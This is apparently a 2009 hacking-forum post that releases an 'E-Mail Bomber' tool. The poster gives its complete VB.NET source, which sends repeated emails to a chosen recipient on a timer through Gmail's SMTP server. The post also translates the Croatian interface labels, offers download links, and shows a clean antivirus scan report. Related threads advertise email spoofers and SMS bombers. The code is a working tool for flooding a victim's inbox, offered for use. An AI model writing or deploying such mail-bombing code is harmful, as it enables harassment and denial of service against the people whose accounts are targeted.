![]() |
| |||||||
![]() |
| | LinkBack | Thread Tools | Display Modes |
| | #1 (permalink) |
| Junior Member Join Date: Sep 2009
Posts: 21
Reputation: -3 ![]() cBay Rating: | Hello I am presenting to you My mail Bomber.. First: You need to have Gmail... Then it's very simple.. Code: Imports System.Net.Mail
Imports System.Web
Imports System.IO
Imports System.Net
Public Class Form1
Dim MyMailMessage As New MailMessage()
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
End Sub
Private Sub startbtn_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles startbtn.Click
Timer1.Start()
End Sub
Private Sub stopbtn_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles stopbtn.Click
Timer1.Stop()
End Sub
Private Sub exitbtn_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles exitbtn.Click
End
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress(usernamebox.Text)
MyMailMessage.To.Add(tobox.Text)
MyMailMessage.Subject = (subjectbox.Text)
MyMailMessage.Body = messagebox.Text
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(usernamebox.Text, passwordbox.Text)
SMTPServer.EnableSsl = True
Label1.Text = Val(Label1.Text + 1)
SMTPServer.Send(MyMailMessage)
End Sub
Private Sub LinkLabel1_LinkClicked(ByVal sender As System.Object, ByVal e As System.Windows.Forms.LinkLabelLinkClickedEventArgs) Handles LinkLabel1.LinkClicked
Process.Start("http://every-stuff.tk")
End Sub
End Class
![]() It is on Croatian So I will transfer on English: Gmail = Gmail Gmail Password = Gmail Password To = To Predmet = Subject Poruka = Message Kreni ! = Start! Stani = Stop Izadji = Exit Downlaod LINK: - RapidShare: 1-CLICK Web hosting - Easy Filehosting - RapidShare: 1-CLICK Web hosting - Easy Filehosting - RapidShare: 1-CLICK Web hosting - Easy Filehosting You Get: Relase ; Debug ; Source ; Form1Desinge Virus Report Of .Exe File : File Info Report generated: 1.10.2009 at 11.03.51 (GMT 1) Filename: E-MailBomberMAN.exe File size: 21 KB MD5 Hash: 606c5adc37e09effca95719e177969e7 SHA1 Hash: 6BDE217A5480BED23B6D22127F1E70C0BBC7DB2A Self-Extract Archive: Nothing found Binder Detector: Nothing found Detection rate: 0 on 23 Detections a-squared - - Avira AntiVir - - Avast - - AVG - - BitDefender - - ClamAV - - Comodo - - Dr.Web - - Ewido - - F-PROT6 - - Ikarus T3 - - Kaspersky - - McAfee - - NOD32 v3 - - Norman - - Panda - - QuickHeal - - Solo Antivirus - - Sophos - - TrendMicro - - VBA32 - - VirusBuster - - ZonerAntivirus - - Scan report generated by NoVirusThanks.org Plz REP + ![]() |
| | |
| Sponsored Links | |
![]() |
| Tags |
| bomber, mail |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
| |
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Spoofmber, the Ultimate Email Spoofer AND Bomber | miXwui | Public Bot / Exploit Releases | 23 | 12-02-2009 04:15 PM |
| [NEW] SMS Bomber International V3.0! (by InuyashaITB) | InuyashaITB | Software Discussion | 10 | 09-18-2009 07:53 PM |
| Does Facebook Friend Bomber not work anymore???? | abotsch31 | Chit Chat | 0 | 08-18-2009 05:41 PM |
| [Release] 7usabball's SMS Bomber | 7usabball | Public Bot / Exploit Releases | 8 | 06-25-2009 05:18 AM |
| Mah first mail from CN | firefreek | Received In The Mail Today | 10 | 01-22-2009 08:22 PM |